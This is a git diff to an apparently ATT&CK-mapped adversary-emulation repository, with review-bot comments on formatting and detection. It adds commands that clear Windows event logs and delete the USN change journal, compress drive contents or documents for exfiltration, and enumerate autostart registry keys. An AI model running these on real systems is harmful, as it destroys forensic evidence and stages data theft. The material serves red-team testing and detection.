diff --git a/Windows/Defense Evasion/Indicator_Removal_on_Host.md b/Windows/Defense Evasion/Indicator_Removal_on_Host.md
index 635e4f78..5be6bba5 100644
--- a/Windows/Defense Evasion/Indicator_Removal_on_Host.md
+++ b/Windows/Defense Evasion/Indicator_Removal_on_Host.md
@@ -11,3 +11,17 @@ Clear system logs
 Clear Security logs
 
 wevtutil cl Security
+
+Clear Setup logs
+
+ wevtutil cl Setup
+
+Clear Application logs
+
+ wevtutil cl Application
+
+## Fsutil
+
+Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume.
+
+ fsutil usn deletejournal /D C:
diff --git a/Windows/Exfiltration/Data_Compressed.md b/Windows/Exfiltration/Data_Compressed.md
new file mode 100644
index 00000000..ac2307f9
--- /dev/null
+++ b/Windows/Exfiltration/Data_Compressed.md
@@ -0,0 +1,11 @@
+# File Deletion
+
+MITRE ATT&CK Technique: [T1002](https://attack.mitre.org/wiki/Technique/T1002)
+
+## PowerShell
+
+ powershell.exe dir c:\* -Recurse | Compress-Archive -DestinationPath C:\test\Data.zip
+
+## Rar
+
+ rar a -r exfilthis.rar *.docx
diff --git a/Windows/Payloads/Discovery.bat b/Windows/Payloads/Discovery.bat
index b7743df7..f11940f2 100644
--- a/Windows/Payloads/Discovery.bat
+++ b/Windows/Payloads/Discovery.bat
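Review bot: The heading of the new file, `# File Deletion`, does not match either the filename Data_Compressed.md or the technique the next line cites, T1002 (Data Compressed), so it reads as a copy-paste leftover from another technique page. Change the first line to `# Data Compressed` so the title, filename and ATT&CK reference agree.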
@@ -8,6 +8,23 @@ net config workstation
 net accounts
 net accounts /domain
 net view
+reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
+reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
+reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
+reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell
+reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell
+reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
 wmic useraccount list
 wmic useraccount get /ALL
 wmic startup list brief
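Review bot: Four of the added `reg query` lines (the `Winlogon\Notify`, `Winlogon\Userinit` and both `Winlogon\\Shell` entries) leave a key path containing a space (`Windows NT`) unquoted, so cmd splits it into two arguments and reg.exe rejects the call, whereas the first added line already shows the quoted form that works; quote those paths the same way, e.g. `reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"`. The doubled backslash in `Winlogon\\Shell` on two lines also looks like a typo rather than an intended path. Inconsistent casing of `Software`/`SOFTWARE` across the lines is harmless to the registry but worth normalizing for readability. From a defender's side, these are the standard autostart (ASEP) locations, and one process issuing this many reg.exe queries in quick succession is itself a recognizable discovery pattern for endpoint telemetry. The batch file continues before and after this hunk.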